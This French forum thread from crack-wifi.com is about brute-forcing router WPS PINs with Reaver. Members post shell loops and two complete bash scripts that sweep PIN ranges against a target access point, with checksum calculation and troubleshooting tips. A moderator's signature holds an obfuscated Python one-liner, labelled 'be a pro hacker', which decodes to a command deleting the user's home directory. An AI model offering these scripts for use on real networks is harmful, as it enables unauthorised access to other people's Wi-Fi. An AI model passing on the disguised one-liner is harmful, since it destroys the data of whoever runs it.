Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-10-2012 23:29:39

imraane
Membre
Inscription : 22-03-2012
Messages : 21

tester un intervalle du code pin avec reaver-wps ?

Bonsoir
s'il vous plaît je voudrais me renseigner si il y'a une option sous reaver-wps pour tester un intervalle donné du code pin d'un routeur ?

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-10-2012 23:31:10

imraane
Membre
Inscription : 22-03-2012
Messages : 21

Re : tester un intervalle du code pin avec reaver-wps ?

je sais que le -p permet de tester directement un code pin mais y a t'il une possibilité de tester un intervalle ?

Hors Ligne

#3 24-10-2012 07:52:24

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : tester un intervalle du code pin avec reaver-wps ?

Non, le manuel ne donne pas d'option pour balayer un intervalle.

Voici une commande pour balayer un intervalle :

 for i in {1000..1050}; do reaver --options=tes_options -p $i >> fichier_de_sortie ;done 

Après ça ton terminal se remplit de

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner [blop] tacnetsol.com>

et le fichier "fichier_de_sortie" se remplit des informations sur le test.

Tu n'auras plus qu'à en extraire des données avec un coup de grep.

Tu peux aussi utiliser une liste de nombres depuis un fichier :

 for i in `cat fichier_nombres`; do reaver --options=tes_options -p $i >> fichier_de_sortie ;done 

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#4 24-10-2012 15:37:08

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : tester un intervalle du code pin avec reaver-wps ?

Je crois qu'il manque un petit sleep, ou quelque chose au milieu parce que  sinon reaver ne s'arrête pas tout seul après le premier PIN qui est celui que tu veux et il va suivre sa marche normale sans se soucier des PIN 1001 jusqu'à 1050.
Et je vois que tu fais ça avec la version 1.4 mais elle est buggée au niveau de l'option -p, ça marche pô si tu fais attention tu verras que c'est toujours le même PIN qui est essayé même si l'attaque fonctione apparemment (si tu te fies du pourcentage, mais si tu regarde le PIN essayé tu verras que c'est toujours le même en boucle)
J'avais l'impresssion qu'en modifiant le fichier key.c on aurait pu y arriver, le fichier est comme ça

#include "keys.h"

/* Arrays of possible pin combinations. Pins with a priority field of 1 get tried first. */

struct key k1[P1_SIZE] = {
		
		{ "0000", 1 },
		{ "0001", 0 },
		{ "0002", 0 },
		{ "0003", 0 },
		{ "0004", 0 },
		{ "0005", 0 },
		{ "0006", 0 },
		{ "0007", 0 },
		{ "0008", 0 },
		{ "0009", 0 },
		{ "0010", 0 },
		{ "0011", 0 },
		{ "0012", 0 },
		{ "0013", 0 },
		{ "0014", 0 },
		{ "0015", 0 },

Ça continue 0016, 0017 etc... jusque là

{ "9997", 0 },
		{ "9998", 0 },
		{ "9999", 1 }
};

struct key k2[P2_SIZE] = {
		{ "567", 1 },
		{ "000", 1 },
		{ "001", 0 },
		{ "002", 0 },
		{ "003", 0 },
		{ "004", 0 },
		{ "005", 0 },
		{ "006", 0 },

Et on voit bien qu'on pase du premier block dee 4 inconnues au 2ème block de trois inconnues vu que le dernier et un checksum des 7 chiffres précédant, le fichier finit comme ça

{ "998", 0 },
		{ "999", 1 }
};

Alors je pensdais qu'en mettant des petits 1 à coté des valeurs qui nous intéressait, on devrait les voir privilégiées et sortir en premier....  mais ça n'a pas marché.
NO C.D.C.*
* "No se de C." = Je n'y connais rien du tout en C... ou C++ pour le coup ll me semble.

Hors Ligne

#5 28-12-2012 15:35:39

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : tester un intervalle du code pin avec reaver-wps ?

Je réveille un peu ce topic pour signaler que la version de développement "SVN" de Reaver a corrigé ce bug de la fonction "-p" smile Pour mettre Reaver à jour depuis le SVN :

cd /tmp/; mkdir reaver
svn co http://reaver-wps.googlecode.com/svn/trunk/ reaver
cd reaver/src
./configure
make
make install

Et comme c'est la période de Noël et des cadeaux, voilà un script complet pour tester une série (croissante) de code PIN avec Reaver wink

#!/bin/bash
# Tester une série (croissante) de code PIN WPS avec Reaver
# by Antares145 for crack-wifi.com

# Si le script est invoqué avec deux arguments, ils sont utilisés comme limites
if [ $# -eq 2 ]
then 
	PIN_FIRST=$1
	PIN_LAST=$2
# Sinon, le script utilise les valeurs statiques ci-dessous
else
	PIN_FIRST=8338138	# Premier PIN à tester, sans le checksum => 7 chiffres !
	PIN_LAST=8338150	# Dernier PIN à tester, sans le checksum => 7 chiffres !
fi

# Paramètres
UPDATE_REAVER=1		# Si 1, mise-à-jour de Reaver depuis le SVN
LOGFILE=reaver_log.txt	# Le fichier où sera copié le résultat des commandes, utiliser "/dev/null" pour désactiver
#Ligne de commande de Reaver, adapter les options ici et terminer par "-p" (-g1 = 1 essai par PIN)
REAVER_OPTS="-i mon0 -b 00:11:22:33:44:55 -c 6 -g1 -p"

#===================================================
# Rien à modifier après cette ligne (normalement...)
#===================================================

# Fonction interne : mise-à-jour de Reaver depuis le SVN
function reaver_update(){
	current_location=`pwd`
	cd /tmp/; mkdir reaver &> /dev/null
	svn co http://reaver-wps.googlecode.com/svn/trunk/ reaver &> /dev/null
	cd reaver/src
	./configure &> /dev/null
	make &> /dev/null
	make install &> /dev/null
	cd $current_location
}

# Fonction interne : calcul du checksum (8ème chiffre du PIN)
# cfr. crack-wifi.com/forum/topic-8649-coder-la-fonction-du-checksum-sur-le-huitieme-chiffre-des-pin-wps.html
function checksum(){
	PIN7=`expr 10 '*' $1`
	ACCUM=0
	ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN7 '/' 10000000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN7 '/' 1000000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN7 '/' 100000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN7 '/' 10000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN7 '/' 1000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN7 '/' 100 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN7 '/' 10 ')' '%' 10 ')'`
	DIGIT=`expr $ACCUM '%' 10`
	CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
}

# Code principal
# --------------

if [ $UPDATE_REAVER -eq 1 ]
then
	echo "Mise-à-jour de Reaver, veuillez patienter..."
	reaver_update
	echo "Reaver mis-à-jour avec succès !"
fi

# Vérification des PIN : longueur et ordre
if [ ${#PIN_FIRST} -ne 7 ] || [ ${#PIN_LAST} -ne 7 ]
then
	echo -e "Les PIN doivent faire 7 chiffres de long !\n"
	exit 1
fi

if [ $PIN_FIRST -ge $PIN_LAST ]
then
	echo -e "PIN invalides, le dernier est inférieur au premier\n"
	exit 1
fi

# Préparation du fichier journal
echo "Date et heure de l'essai : `date`" > $LOGFILE
echo -e "**************************\n" >> $LOGFILE

# Boucle : calcul des checksum et passage à Reaver
trap "exit" INT	# Intercepte le CTRL-C pour pouvoir sortir de la boucle
NUMBER_OF_PINS=`expr $PIN_LAST '-' $PIN_FIRST`
echo Lancement du test : $NUMBER_OF_PINS codes PIN à tester
if [ $NUMBER_OF_PINS -ge 100 ]
then
	echo "Bon courage..."	# :-)
fi

for code in $(seq $PIN_FIRST $PIN_LAST)
do
	checksum $code	# Calcul du checksum pour avoir le pin complet
	pin=$code$CHECKSUM	# pin complet à utiliser
	echo "Test du PIN $pin" | tee -a reaver_log.txt
	reaver $REAVER_OPTS $pin | tee -a reaver_log.txt
done
echo -e "Test terminé !\n"
grep -A2 "Pin cracked in" $LOGFILE	# Si le crack a réussi, on récupère le résultat dans le journal
echo -e "\n Le détail se trouve dans le fichier $LOGFILE"

exit 0

Collez ceci dans un fichier "wps_sequence.sh", rendez-le exécutable puis lancez-le :

chmod +x wps_sequence.sh
# Soit vous donnez le premier et le dernier PIN à tester
./wps_sequence.sh 1111111 2222222
# Soit vous le lancez sans argument et vous modifiez les valeurs du premier et dernier PIN directement dans le script
./wps_sequence.sh

Attention, il faut donner les codes PIN sans le dernier chiffre (checksum). le script se chargera de générer un checksum valide et d'envoyer le tout à Reaver.

Kcdtv, il y a peut-être une partie utilisable pour tes travaux personnels smile

Dernière modification par antares145 (28-12-2012 22:56:56)

Hors Ligne

#6 28-12-2012 19:24:21

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : tester un intervalle du code pin avec reaver-wps ?

Merci antares145  pour ce travail !

J'ai des questions :

1- Je telecharge revaer avec apt-get update   donc c'est la même chose que de le telecharger de code.google  le dezziper  l'installer make make install etc... ?

2- Même  après avoir telechargé et installé reaver  , faut que je mette à jour reaver depuis le SVN  ?

3- Le fichier "wps_sequence.sh",  existe déjà ou faut crèer un fichier text le nommer aonsi et mettre ce qui faut dedans ?

4-Comment lancer l'attaque  comme d'hab avec  reaver  ? ou bien faut passer par une autre commande ?

Merci .

Hors Ligne

#7 28-12-2012 19:56:45

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : tester un intervalle du code pin avec reaver-wps ?

abradacabra a écrit :

1- Je telecharge revaer avec apt-get update   donc c'est la même chose que de le telecharger de code.google  le dezziper  l'installer make make install etc... ?

Je ne pense pas. la version des dépôts apt-get est la dernière version stable, donc la 1.4 avec le bug. A mon avis, la version zippée sur le site est la même que celle dans les dépôts, donc elle ne résoud rien. La version SVN par contre est la "version de travail" du programmeur, pas officiellement stable mais plus récente. Dans le cas présent, il n'y a pas de problème de stabilité ET le bug gênant ici a été résolu donc tout bénèf smile

2- Même  après avoir telechargé et installé reaver  , faut que je mette à jour reaver depuis le SVN  ?

Tu peux, ça remplacera juste les fichiers installés depuis les dépôts ou l'archive zip. La commande "make install" se charge de copier les programmes "au bon endroit", écrasant au passage les fichiers qui y seraient déjà. Donc en pratique ça ne sert à rien d'installer Reaver depuis les dépôts si c'est pour faire la mise-à-jour SVN après tongue Si ça t'inquiète de ne pas pouvoir désinstaller Reaver "proprement" par cette méthode (en fait un simple "make uninstall" suffit), il y a probablement moyen de créer un paquet .DEB à partir des sources SVN compilées, je vais voir ça de plus près.

3- Le fichier "wps_sequence.sh",  existe déjà ou faut crèer un fichier text le nommer aonsi et mettre ce qui faut dedans ?

Non il n'existe pas, comme je l'ai indiqué tu dois créer un nouveau fichier (de type "texte, oui), coller le contenu du script, et le rendre exécutable.

4-Comment lancer l'attaque  comme d'hab avec  reaver  ? ou bien faut passer par une autre commande ?

Si tu regardes le code du script (prends l’habitude de ne pas exécuter des commandes sans les comprendre), tu verras que la commande Reaver est déjà intégrée. Donc tu dois juste lancer le script, avec ou sans argument (j'ai indiqué les deux en exemple), et il fait tout le boulot wink

Hors Ligne

#8 28-12-2012 20:06:00

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : tester un intervalle du code pin avec reaver-wps ?

Merci je vais voir ça tout de suite

Edit : ça fontionne sans problème antares145 !

Ps : le ctrl+c ne fonctionne aps pour arreter le test .

Dernière modification par abradacabra (28-12-2012 21:53:41)

Hors Ligne

#9 28-12-2012 22:55:39

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : tester un intervalle du code pin avec reaver-wps ?

abradacabra a écrit :

Ps : le ctrl+c ne fonctionne aps pour arreter le test .

En fait si mais il faut insister big_smile
Un CTRL+C interromp l'instance courante de la boucle FOR, mais la suivante est lancée immédiatement. En tapant CTRL-C rapidement 3 ou 4 fois, le script est interrompu wink

Mais t'as raison, ça fait pas très propre. J'ai ajouté une ligne trap "exit" INT (juste avant la boucle, ligne 74) pour intercepter le signal et sortir du script immédiatement.

Content que ça fonctionne pour toi !

Dernière modification par antares145 (28-12-2012 22:55:56)

Hors Ligne

#10 29-12-2012 18:56:14

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : tester un intervalle du code pin avec reaver-wps ?

Quelque chose ne va pas je pense :

Mise-à-jour de Reaver, veuillez patienter...
Reaver mis-à-jour avec succès !
Lancement du test : 9 codes PIN à tester
Test du PIN xxxxxxxxx

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from xxxxxxxxxxxxxxxxx
[+] Associated with 00:24:B2:FC:11:C4 (ESSID: xxxxxxxxx)
[+] 90.91% complete @ 2012-12-29 13:10:24 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:11:01 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:13:46 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:14:35 (0 seconds/pin)
[!] WARNING: Failed to associate with xxxxxxxxxxxxxxxxxxx (ESSID: xxxxxx)
[+] 90.91% complete @ 2012-12-29 13:17:00 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:20:32 (0 seconds/pin)                               
[+] 90.91% complete @ 2012-12-29 13:22:33 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:24:04 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:24:49 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:26:10 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:29:15 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:30:51 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:33:44 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:35:09 (0 seconds/pin)
[+] 90.91% complete @ 2012-12-29 13:36:45 (0 seconds/pin)


9 PIN à tester  mais il s'arrete aps à 9 test  ?
Ca veut dire quoi ce (0 seconds/pin) qui revient à chaque fois ?

Dernière modification par abradacabra (29-12-2012 19:00:42)

Hors Ligne

#11 29-12-2012 21:27:32

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : tester un intervalle du code pin avec reaver-wps ?

Exellent antares, je suis encore un peu en vacances, mais en 2013 je vais reprendre tout ça avec les exellentes modifications que tu m'a suggéré et puis cette attaque sélective au niveau du pIN on peut lui donner un très bon usage pour certains routeurs....
Yes! big_smile

@ abradcadabra,
ceci es ton taux de PIN correctement pro-cessé, à comprendre comme un pin toute les x secondes
0segondes-pin çá veut dire que tu n'as strictement rien fais hmm

Hors Ligne

#12 30-12-2012 15:35:06

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : tester un intervalle du code pin avec reaver-wps ?

@abracadabra :

Si tu regardes bien, il ne teste qu'un seul PIN (puisqu'il n'y a qu'une seule ligne "Test du PIN xxxxxxxx". D'ailleurs c'est confirmé par le "0 PIN testé par seconde", puisqu'il n'arrive même pas à tester le premier wink
Simplement, Reaver réessaie le même PIN s'il n'arrive pas à le tester, ce qui est manifestement le cas ici. Soit parce que l'AP est "bloqué" (et n'accepte plus d'autre essai), soit parce que la liaison n'est pas bonne. Je penche plus pour la seconde option, si le routeur était "bloqué" Reaver te le signalerait. Si tu veux avoir plus de détails sur le problème, ajoute l'option "-vv" à la ligne de commande de Reaver pour activer le mode verbose (bavard). La ligne "REAVER_OPTS devient donc :

REAVER_OPTS="-i mon0 -b 00:11:22:33:44:55 -c 6 -g1 -vv -p"

C'est le comportement de Reaver qui pose problème ici, et il n'y a pas d'option pour changer cet aspect-là hmm Si c'est un problème pour toi, tu peux spécifier le délai maximum pendant lequel Reaver teste un PIN donné. Pour ça, ajoute un "timeout 10" devant la commande de Reaver, pour lui laisser 10 seconde avant de passer au PIN suivant (à mon avis 10 c'est un peu court, mais tu vois l'idée). Le script se modifie donc comme suit :

# Laisser 10 secondes/pin à Reaver
timeout 10 reaver $REAVER_OPTS $pin | tee -a reaver_log.txt

Je n'ai pas encore modifié le script ci-dessus pour l'ajouter, vu que je n'ai pas encore pu tester la modification wink

Hors Ligne

#13 24-02-2013 02:58:27

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : tester un intervalle du code pin avec reaver-wps ?

j'ai reinstallé backtrack5 et reaver 1.4,mais quand je fait .chmod +x wps_sequence.sh puis ./wps_sequence.sh,u essage d'erreur affiche :bash: pas de ...;;malré que ca marhait avant avec moi!!!!

Hors Ligne

#14 24-02-2013 05:20:28

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : tester un intervalle du code pin avec reaver-wps ?

il faut vraiment être précis quand tu reportes une erreur et utiliser la balise code....
là on voit que bash te dit quelque chose. Ce qui compte c'est savoir quoi si tu veux résoudre.
Es tu situé dans le bon dossier?
C'est à dire qu'il te faut lancer l ordre d'exécution depuis le dossier ou se trouve ton script intervale.sh.
Et puis si ce n'est pas ça le problème il nous faut le message d'erreur complet et à la virgule près wink

Hors Ligne

#15 27-02-2013 01:18:53

nabbouti
Membre Hyperactif
Inscription : 30-08-2012
Messages : 60

Re : tester un intervalle du code pin avec reaver-wps ?

ca marche,mais il suit pas l'algorithme de reaver,car il incrimente dans les 4 chiffre a droite seulement par contre reaver il teste la moitié a gauche.
autre chose c'est si la clé est decrypté par SVN ,comme le cas que j'ai testé sur mon routeur thomson TG585,reaver continue meme apres avoir trouvé la clé ,
j'attend bien qu'il sort une fois la clé trouvée

Hors Ligne

#16 07-04-2013 10:57:00

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : tester un intervalle du code pin avec reaver-wps ?

nabbouti, inutile de m'envoyer tes demandes par message privé, je n'y répondrai pas plus vite wink

Par MP, nabbouti a écrit :

merci de votre algo de svn reaver.mais je veux bien si possible une modification sur cette version afin d incrementer les 4 premiers chiffres du PIN WPS XXXXYYYY
exemple reaver 1,4
cette version incrmente les 4 premiers  chiffre comme pqr exemple :
1234XXXX  ca donne 1235XXXX puis 1236XXXX  etc
et merci

Essaie le code suivant :

#!/bin/bash
# Tester une série (croissante) de demi-code PIN WPS avec Reaver
# by Antares145 for crack-wifi.com

# Si le script est invoqué avec deux arguments, ils sont utilisés comme limites
if [ $# -eq 2 ]
then 
	HALF_PIN_FIRST=$1
	HALF_PIN_LAST=$2
# Sinon, le script utilise les valeurs statiques ci-dessous
else
	HALF_PIN_FIRST=0000	# Première moitié de PIN à tester
	HALF_PIN_LAST=5555	# Dernière moitié de PIN à tester
fi

# Paramètres
PADDING=000			# Remplissage pour la seconde moitié du code PIN (3 chiffres)
UPDATE_REAVER=1		# Si 1, mise-à-jour de Reaver depuis le SVN (mettre à 0 pour désactiver)
LOGFILE=reaver_log.txt	# Le fichier où sera copié le résultat des commandes, utiliser "/dev/null" pour désactiver
#Ligne de commande de Reaver, adapter les options ici et terminer par "-p" (-g1 = 1 essai par PIN)
REAVER_OPTS="-i mon0 -b 00:11:22:33:44:55 -c 6 -g1 -p"

#===================================================
# Rien à modifier après cette ligne (normalement...)
#===================================================

# Fonction interne : mise-à-jour de Reaver depuis le SVN
function reaver_update(){
	current_location=`pwd`
	cd /tmp/; mkdir reaver &> /dev/null
	svn co http://reaver-wps.googlecode.com/svn/trunk/ reaver &> /dev/null
	cd reaver/src
	./configure &> /dev/null
	make &> /dev/null
	make install &> /dev/null
	cd $current_location
}

# Fonction interne : calcul du checksum (8ème chiffre du PIN)
# cfr. crack-wifi.com/forum/topic-8649-coder-la-fonction-du-checksum-sur-le-huitieme-chiffre-des-pin-wps.html
function checksum(){
	PIN7=`expr 10 '*' $1`
	ACCUM=0
	ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN7 '/' 10000000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN7 '/' 1000000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN7 '/' 100000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN7 '/' 10000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN7 '/' 1000 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN7 '/' 100 ')' '%' 10 ')'`
	ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN7 '/' 10 ')' '%' 10 ')'`
	DIGIT=`expr $ACCUM '%' 10`
	CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
}

# Code principal
# --------------

if [ $UPDATE_REAVER -eq 1 ]
then
	echo "Mise-à-jour de Reaver, veuillez patienter..."
	reaver_update
	echo "Reaver mis-à-jour avec succès !"
fi

# Vérification des PIN : longueur et ordre
if [ ${#HALF_PIN_FIRST} -ne 4 ] || [ ${#HALF_PIN_LAST} -ne 4 ]
then
	echo -e "Les demi-PIN doivent faire 4 chiffres de long !\n"
	exit 1
fi

if [ $HALF_PIN_FIRST -ge $HALF_PIN_LAST ]
then
	echo -e "Demi-PIN invalides, le dernier est inférieur au premier\n"
	exit 1
fi

# Préparation du fichier journal
echo "Date et heure de l'essai : `date`" > $LOGFILE
echo -e "**************************\n" >> $LOGFILE

# Boucle : calcul des checksum et passage à Reaver
trap "exit" INT	# Intercepte le CTRL-C pour pouvoir sortir de la boucle
NUMBER_OF_PINS=`expr $HALF_PIN_LAST '-' $HALF_PIN_FIRST`
echo Lancement du test : $NUMBER_OF_PINS codes PIN à tester
if [ $NUMBER_OF_PINS -ge 100 ]
then
	echo "Bon courage..."	# :-)
fi

for CODE in $(seq -f "%04g" $HALF_PIN_FIRST $HALF_PIN_LAST)
do
	CODE=$CODE$PADDING	# On ajoute 3 chiffres de remplissage pour la seconde moitié
	checksum $CODE	# Calcul du checksum pour avoir le pin complet
	PIN=$CODE$CHECKSUM	# pin complet à utiliser
	echo "Test du PIN $PIN" | tee -a reaver_log.txt
	reaver $REAVER_OPTS $PIN | tee -a reaver_log.txt
done
echo -e "Test terminé !\n"
grep -A2 "Pin cracked in" $LOGFILE	# Si le crack a réussi, on récupère le résultat dans le journal
echo -e "\n Le détail se trouve dans le fichier $LOGFILE"

exit 0

Comme tu n'as aucune demande spécifique sur la seconde moitié du PIN, je mets "000" par défaut (le dernier chiffre est un checksum qui doit être calculé en fonction des autres). Tu peux changer ça dans la variable $PADDING du code.

Pour l'utiliser, ou bien tu l'appelles avec 2 arguments :

./reaver-scan.sh 1234 5678
# Teste les PIN 1234XXXX à 5678XXXX

Ou bien tu changes les variables $FIRST_HALF_PIN et $LAST_HALF_PIN dans le code et tu appelles le script sans argument :

./reaver-scan.sh

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
2 93 Hier 21:54:52 par GreyBird
0 113 02-12-2016 21:32:19 par tit64
4 320 20-11-2016 14:31:08 par richie
Épinglée :
21 14703 20-11-2016 12:53:07 par richie
Problème reaver par Antho3674
4 301 15-11-2016 22:05:12 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]